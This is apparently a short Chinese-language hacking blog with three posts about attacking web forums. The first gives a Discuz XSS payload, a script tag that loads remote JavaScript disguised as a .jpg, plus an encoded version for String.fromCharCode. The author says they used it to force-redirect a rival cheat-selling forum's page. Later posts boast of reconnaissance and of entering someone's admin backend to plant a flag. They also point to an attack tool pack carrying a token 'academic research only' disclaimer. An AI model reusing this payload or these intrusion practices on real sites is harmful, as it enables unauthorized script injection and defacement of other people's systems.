Friday, September 5, 2014

discuz xss(舊) script

 discuz xss(舊) script

其實呢,這個漏洞,還有一種變種的方式就是

String.fromCharCode



<script src=http://upload.lsforum.net/users/public/d12111m32.jpg></script>

074 163 143 162 151 160 164 040 163 162 143 075 150 164 164 160 072 057 057 165 160 154 157 141 144 056 154 163 146 157 162 165 155 056 156 145 164 057 165 163 145 162 163 057 160 165 142 154 151 143 057 144 061 062 061 061 061 155 063 062 056 152 160 147 076 074 057 163 143 162 151 160 164 076


統神大戰蛇王,去她賣掛論壇偷掛scrript發動小型戰役!!,實現一個小跳轉,就把她賣帳號的那個頁面,強迫跳轉 中二
http://upload.lsforum.net/users/public/d12111m32.jpg

標籤: ,

Wednesday, July 16, 2014

踩點 點解?

踩點 hacking part2


採到老大惹不敢進去
標籤: ,

Tuesday, July 15, 2014

first hacking

first hacking


第一次進入別人家後台還掛個旗子

教訓

要記取教訓阿,mega裡有工具包僅供學術研究,上次忘記加這句就被抄家了別害人阿

標籤: ,